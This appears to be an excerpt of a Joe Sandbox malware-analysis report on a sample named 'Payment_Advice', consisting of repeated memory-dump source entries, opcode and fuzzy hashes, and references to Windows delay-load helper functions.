                                                                                                    • Associated: 00000000.00000002.1549363309.0000000000563000.00000002.00000001.01000000.00000003.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_500000_Payment_Advice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                    • String ID: Q
                                                                                                    • API String ID: 1269201914-2173417064
                                                                                                    • Opcode ID: 8d0572a2d8c383412c70aacc194b8ae3d35ec7786a5d17096cccb95167c04ced
                                                                                                    • Instruction ID: 378ac677554efa7b5ff99d329538453ed0273d07b6af1ae583eb90d8de047065
                                                                                                    • Opcode Fuzzy Hash: 8d0572a2d8c383412c70aacc194b8ae3d35ec7786a5d17096cccb95167c04ced
                                                                                                    • Instruction Fuzzy Hash: 20B012E5298001BC320452155D0BCB70E4CF4C2B20330843EFC06C2180DC606D8B4531
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0051E1E3
                                                                                                      • Part of subcall function 0051E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0051E8D0
                                                                                                      • Part of subcall function 0051E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0051E8E1
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1549101071.0000000000501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00500000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1548984734.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1549138883.0000000000533000.00000002.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1549193714.000000000053E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000545000.00000004.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000562000.00000004.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1549363309.0000000000563000.00000002.00000001.01000000.00000003.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_500000_Payment_Advice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                    • String ID: Q
                                                                                                    • API String ID: 1269201914-2173417064
                                                                                                    • Opcode ID: a7a0d5b60010daa07a571d8def9a1ebf5314ef011f9639b07b1adb166ddfe60c
                                                                                                    • Instruction ID: 4195fee43cd1a90adf2cb42233417f70261ff967645357455436c77136b43045
                                                                                                    • Opcode Fuzzy Hash: a7a0d5b60010daa07a571d8def9a1ebf5314ef011f9639b07b1adb166ddfe60c
                                                                                                    • Instruction Fuzzy Hash: 74B012F5298001BC320455151D0BCB70E4CF5C2F10330453EFC06C2081DC506E834531
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0051E1E3
                                                                                                      • Part of subcall function 0051E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0051E8D0
                                                                                                      • Part of subcall function 0051E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0051E8E1
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1549101071.0000000000501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00500000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1548984734.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1549138883.0000000000533000.00000002.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1549193714.000000000053E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000545000.00000004.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000562000.00000004.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1549363309.0000000000563000.00000002.00000001.01000000.00000003.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_500000_Payment_Advice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                    • String ID: Q
                                                                                                    • API String ID: 1269201914-2173417064
                                                                                                    • Opcode ID: 7d08450ebf8ec5292fe76ed7d99e509d95b927476b4b40e8a0095a8fb3eedba1
                                                                                                    • Instruction ID: ff1213c31391eccba8939b545da05287153470130d4ab4a3cd1a149b8a1621ac
                                                                                                    • Opcode Fuzzy Hash: 7d08450ebf8ec5292fe76ed7d99e509d95b927476b4b40e8a0095a8fb3eedba1
                                                                                                    • Instruction Fuzzy Hash: 04B012F5298001BC320451161C0BCB70E4CF5C2F10330453EFC06C2081D8506D824531
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0051E1E3
                                                                                                      • Part of subcall function 0051E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0051E8D0
                                                                                                      • Part of subcall function 0051E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0051E8E1
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1549101071.0000000000501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00500000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1548984734.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1549138883.0000000000533000.00000002.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1549193714.000000000053E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000545000.00000004.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000562000.00000004.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1549363309.0000000000563000.00000002.00000001.01000000.00000003.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_500000_Payment_Advice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                    • String ID: Q
                                                                                                    • API String ID: 1269201914-2173417064
                                                                                                    • Opcode ID: 3342660e8071ad461734cbbf7ec9a63275a531bad1161d2f77a115abf2dd9ff0
                                                                                                    • Instruction ID: 7725d87622a404d86836628aef19e3c8dc856421bd0c6678397a178f7ccd7ab7
                                                                                                    • Opcode Fuzzy Hash: 3342660e8071ad461734cbbf7ec9a63275a531bad1161d2f77a115abf2dd9ff0
                                                                                                    • Instruction Fuzzy Hash: B7B012F5298101BD324451151C0BCB70E4CF5C2F10330463EFC06C2081D8506DC24571
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0051E1E3
                                                                                                      • Part of subcall function 0051E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0051E8D0
                                                                                                      • Part of subcall function 0051E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0051E8E1
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1549101071.0000000000501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00500000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1548984734.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1549138883.0000000000533000.00000002.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1549193714.000000000053E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000545000.00000004.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000562000.00000004.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1549363309.0000000000563000.00000002.00000001.01000000.00000003.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_500000_Payment_Advice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                    • String ID: Q
                                                                                                    • API String ID: 1269201914-2173417064
                                                                                                    • Opcode ID: c0e466547fea7025509c8ac3c3510460ce548305894511de9a5e226570b01f55
                                                                                                    • Instruction ID: 5bad1e12a893a58c0487441948fdc6a9072287219f02220e92903c9140319eb1
                                                                                                    • Opcode Fuzzy Hash: c0e466547fea7025509c8ac3c3510460ce548305894511de9a5e226570b01f55
                                                                                                    • Instruction Fuzzy Hash: A0B012F5298001BC321451151D0BCB70ECCF4C2B10730443EFC06C2080DC506DC34531
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

APIs
• ___delayLoadHelper2@8.DELAYIMP ref: 0051E1E3
  • Part of subcall function 0051E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0051E8D0
  • Part of subcall function 0051E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0051E8E1
Strings
Memory Dump Source
• Source File: 00000000.00000002.1549101071.0000000000501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00500000, based on PE: true
• Associated: 00000000.00000002.1548984734.0000000000500000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1549138883.0000000000533000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1549193714.000000000053E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1549193714.0000000000545000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1549193714.0000000000562000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1549363309.0000000000563000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_500000_Payment_Advice.jbxd
Similarity
• API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
• String ID: Q
• API String ID: 1269201914-2173417064
• Opcode ID: 64d75098faa350a264ca4ef68e46456e8a199c3ca54616163eceb4b17126f9ec
• Instruction ID: 1ab5a3ba847742a53dee2997fbcdd5b6b2542b5c461fd2043b2f948adb45dbaa
• Opcode Fuzzy Hash: 64d75098faa350a264ca4ef68e46456e8a199c3ca54616163eceb4b17126f9ec
• Instruction Fuzzy Hash: 69B012E5298001BC321451155C0BCF70E4CF4C2B10330483EFC06C20C0D8506C824531
Uniqueness
Uniqueness Score: -1.00%

APIs
• ___delayLoadHelper2@8.DELAYIMP ref: 0051E51F
  • Part of subcall function 0051E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0051E8D0
  • Part of subcall function 0051E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0051E8E1
Strings
Memory Dump Source
• Source File: 00000000.00000002.1549101071.0000000000501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00500000, based on PE: true
• Associated: 00000000.00000002.1548984734.0000000000500000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1549138883.0000000000533000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1549193714.000000000053E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1549193714.0000000000545000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1549193714.0000000000562000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1549363309.0000000000563000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_500000_Payment_Advice.jbxd
Similarity
• API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
• String ID: (Q
• API String ID: 1269201914-982174220
• Opcode ID: a28208e013271a5ab066f1ce1e945e8f8af0941dfb60797f29cd8ff4a6b969cb
• Instruction ID: 384d580720536c458eabb9d62dd21b44398fb2f1b5a4bad166f055dde481dd3b
• Opcode Fuzzy Hash: a28208e013271a5ab066f1ce1e945e8f8af0941dfb60797f29cd8ff4a6b969cb
• Instruction Fuzzy Hash: A8B012D12581017C3304520C5C0FC7F0E5DF4C1F20330462EFC04C1080F9400CCA0631
Uniqueness
Uniqueness Score: -1.00%

APIs
• ___delayLoadHelper2@8.DELAYIMP ref: 0051E51F
  • Part of subcall function 0051E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0051E8D0
  • Part of subcall function 0051E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0051E8E1
Strings
Memory Dump Source
• Source File: 00000000.00000002.1549101071.0000000000501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00500000, based on PE: true
• Associated: 00000000.00000002.1548984734.0000000000500000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1549138883.0000000000533000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1549193714.000000000053E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1549193714.0000000000545000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1549193714.0000000000562000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1549363309.0000000000563000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_500000_Payment_Advice.jbxd
Similarity
• API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
• String ID: (Q
• API String ID: 1269201914-982174220
• Opcode ID: 102e6c8bd5d964202d85397b0c4c0600f505c3bb58103d5e3b15498fef279dd1
• Instruction ID: 8ecb05370b9ee4b97d56e7f7892030b7e8e7a765df67a891f2afe4793ca95dab
• Opcode Fuzzy Hash: 102e6c8bd5d964202d85397b0c4c0600f505c3bb58103d5e3b15498fef279dd1
• Instruction Fuzzy Hash: 69B012E125C0017C320412281C0FC7F0E0DF4C1F20730543EFC10D04C1B9400D8A0531
Uniqueness
Uniqueness Score: -1.00%

APIs
• ___delayLoadHelper2@8.DELAYIMP ref: 0051E51F
  • Part of subcall function 0051E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0051E8D0
  • Part of subcall function 0051E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0051E8E1
Strings
Memory Dump Source
• Source File: 00000000.00000002.1549101071.0000000000501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00500000, based on PE: true
• Associated: 00000000.00000002.1548984734.0000000000500000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1549138883.0000000000533000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1549193714.000000000053E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1549193714.0000000000545000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1549193714.0000000000562000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1549363309.0000000000563000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_500000_Payment_Advice.jbxd
Similarity
• API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
• String ID: (Q
• API String ID: 1269201914-982174220
• Opcode ID: 2e2058d4fc799fc04c97a45818e45f93b7520e72a0fcb3e2b1cad2c1fed61193
• Instruction ID: d07639e87e373bab5986571af49475234fc641869047851e3ee75bedde6fefd7
• Opcode Fuzzy Hash: 2e2058d4fc799fc04c97a45818e45f93b7520e72a0fcb3e2b1cad2c1fed61193
• Instruction Fuzzy Hash: 05B012D1658001BC3204920C5C0FC7F0F5DF4C5F20330852EFC04C1080F9404C860631
Uniqueness
Uniqueness Score: -1.00%

APIs
• ___delayLoadHelper2@8.DELAYIMP ref: 0051E51F
  • Part of subcall function 0051E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0051E8D0
  • Part of subcall function 0051E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0051E8E1
Strings
Memory Dump Source
• Source File: 00000000.00000002.1549101071.0000000000501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00500000, based on PE: true
• Associated: 00000000.00000002.1548984734.0000000000500000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1549138883.0000000000533000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1549193714.000000000053E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1549193714.0000000000545000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1549193714.0000000000562000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1549363309.0000000000563000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_500000_Payment_Advice.jbxd
Similarity
• API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
• String ID: (Q
• API String ID: 1269201914-982174220
• Opcode ID: ba685e92d53da3c6016589c9f56446b14ca6f214655d56dd3865532bc0b299b1
• Instruction ID: 0289a0ff10d8d32a8d6fd719b2e693be48e669da978286ef03dbfe208c18dc66
• Opcode Fuzzy Hash: ba685e92d53da3c6016589c9f56446b14ca6f214655d56dd3865532bc0b299b1
• Instruction Fuzzy Hash: A3B012D12580417C3244520C1D0BC7F0E4DF4C1F20330842EFC04C1080F9400C870631
Uniqueness
Uniqueness Score: -1.00%

APIs
• ___delayLoadHelper2@8.DELAYIMP ref: 0051E580
  • Part of subcall function 0051E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0051E8D0
  • Part of subcall function 0051E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0051E8E1
Strings
Memory Dump Source
• Source File: 00000000.00000002.1549101071.0000000000501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00500000, based on PE: true
• Associated: 00000000.00000002.1548984734.0000000000500000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1549138883.0000000000533000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1549193714.000000000053E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1549193714.0000000000545000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1549193714.0000000000562000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1549363309.0000000000563000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_500000_Payment_Advice.jbxd
Similarity
• API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
• String ID: FvnQ
• API String ID: 1269201914-3908200080
• Opcode ID: edbb96d7f344e0838edce2cd95fccc59dfa235146c2a3d2eaffb13433e4221ac
• Instruction ID: 52a7335371a060eb442a6f4d58525651013481ab64af98f7d12e969e17493030
• Opcode Fuzzy Hash: edbb96d7f344e0838edce2cd95fccc59dfa235146c2a3d2eaffb13433e4221ac
• Instruction Fuzzy Hash: D9B012D16591017D3244A1581C07C7B0E8DF4C1B10331442EFC04C2080E8500C820531
Uniqueness
Uniqueness Score: -1.00%

APIs
• ___delayLoadHelper2@8.DELAYIMP ref: 0051E580
  • Part of subcall function 0051E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0051E8D0
  • Part of subcall function 0051E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0051E8E1
Strings
Memory Dump Source
• Source File: 00000000.00000002.1549101071.0000000000501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00500000, based on PE: true
• Associated: 00000000.00000002.1548984734.0000000000500000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1549138883.0000000000533000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1549193714.000000000053E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1549193714.0000000000545000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1549193714.0000000000562000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1549363309.0000000000563000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_500000_Payment_Advice.jbxd
Similarity
• API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
• String ID: FvnQ
• API String ID: 1269201914-3908200080
• Opcode ID: f09d8e8f62443e99bc7cf7081e1c9c43a7a5809830f617eff222e2857eafd6da
• Instruction ID: f39c82a2866d712456f794a39836473f5a67fed648a9be4f96a14d22be800a96
• Opcode Fuzzy Hash: f09d8e8f62443e99bc7cf7081e1c9c43a7a5809830f617eff222e2857eafd6da
• Instruction Fuzzy Hash: 6AB012E16582017D3244A1585C07C7B0EADF4C1B10331462EFC04C2080E8400CC20531
Uniqueness
Uniqueness Score: -1.00%

APIs
• ___delayLoadHelper2@8.DELAYIMP ref: 0051E580
  • Part of subcall function 0051E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0051E8D0
  • Part of subcall function 0051E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0051E8E1
Strings
Memory Dump Source
• Source File: 00000000.00000002.1549101071.0000000000501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00500000, based on PE: true
• Associated: 00000000.00000002.1548984734.0000000000500000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1549138883.0000000000533000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1549193714.000000000053E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1549193714.0000000000545000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1549193714.0000000000562000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1549363309.0000000000563000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_500000_Payment_Advice.jbxd
Similarity
• API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
• String ID: FvnQ
• API String ID: 1269201914-3908200080
• Opcode ID: 9c5faa4e6545e3b78c9f62bfc2f85352e77bed2f4bde53d174e22d454e88ad5f
• Instruction ID: bdd937751aa5b4fb497b535f85f411053e568b8a313c4aca544118b33a9002e7
• Opcode Fuzzy Hash: 9c5faa4e6545e3b78c9f62bfc2f85352e77bed2f4bde53d174e22d454e88ad5f
• Instruction Fuzzy Hash: 80B012E16581017C3204A1585D07C7B4EADF4C1B10371462EFC04C2080EC400D830531
Uniqueness
Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0051E1E3
                                                                                                      • Part of subcall function 0051E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0051E8D0
                                                                                                      • Part of subcall function 0051E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0051E8E1
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1549101071.0000000000501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00500000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1548984734.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1549138883.0000000000533000.00000002.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1549193714.000000000053E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000545000.00000004.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000562000.00000004.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1549363309.0000000000563000.00000002.00000001.01000000.00000003.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_500000_Payment_Advice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                    • String ID: Q
                                                                                                    • API String ID: 1269201914-2173417064
                                                                                                    • Opcode ID: e79f5ecbc0742461898dd6528af2eab18a8408183d4ce3ae649ac009c8e35488
                                                                                                    • Instruction ID: 57443957aa994ddf51618c6ab4adb63bfd46b8364081013a22d4c7ac4f8f571a
                                                                                                    • Opcode Fuzzy Hash: e79f5ecbc0742461898dd6528af2eab18a8408183d4ce3ae649ac009c8e35488
                                                                                                    • Instruction Fuzzy Hash: AAA011EA2A8002BC300822222C0BCBB0E0CF8C2B20330882EFC03C0080A88028820830
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0051E1E3
                                                                                                      • Part of subcall function 0051E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0051E8D0
                                                                                                      • Part of subcall function 0051E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0051E8E1
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1549101071.0000000000501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00500000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1548984734.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1549138883.0000000000533000.00000002.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1549193714.000000000053E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000545000.00000004.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000562000.00000004.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1549363309.0000000000563000.00000002.00000001.01000000.00000003.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_500000_Payment_Advice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                    • String ID: Q
                                                                                                    • API String ID: 1269201914-2173417064
                                                                                                    • Opcode ID: ab01764e80feffea34cab7183cc176e49019d1ed60cfdf285aaa725e3c0a906a
                                                                                                    • Instruction ID: 57443957aa994ddf51618c6ab4adb63bfd46b8364081013a22d4c7ac4f8f571a
                                                                                                    • Opcode Fuzzy Hash: ab01764e80feffea34cab7183cc176e49019d1ed60cfdf285aaa725e3c0a906a
                                                                                                    • Instruction Fuzzy Hash: AAA011EA2A8002BC300822222C0BCBB0E0CF8C2B20330882EFC03C0080A88028820830
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0051E1E3
                                                                                                      • Part of subcall function 0051E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0051E8D0
                                                                                                      • Part of subcall function 0051E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0051E8E1
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1549101071.0000000000501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00500000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1548984734.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1549138883.0000000000533000.00000002.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1549193714.000000000053E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000545000.00000004.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000562000.00000004.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1549363309.0000000000563000.00000002.00000001.01000000.00000003.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_500000_Payment_Advice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                    • String ID: Q
                                                                                                    • API String ID: 1269201914-2173417064
                                                                                                    • Opcode ID: d4a4c04d996de001eb491cf6563a5f48a29e5f569089b6b8adccc3d7a84ecc21
                                                                                                    • Instruction ID: 57443957aa994ddf51618c6ab4adb63bfd46b8364081013a22d4c7ac4f8f571a
                                                                                                    • Opcode Fuzzy Hash: d4a4c04d996de001eb491cf6563a5f48a29e5f569089b6b8adccc3d7a84ecc21
                                                                                                    • Instruction Fuzzy Hash: AAA011EA2A8002BC300822222C0BCBB0E0CF8C2B20330882EFC03C0080A88028820830
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0051E1E3
                                                                                                      • Part of subcall function 0051E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0051E8D0
                                                                                                      • Part of subcall function 0051E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0051E8E1
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1549101071.0000000000501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00500000, based on PE: true
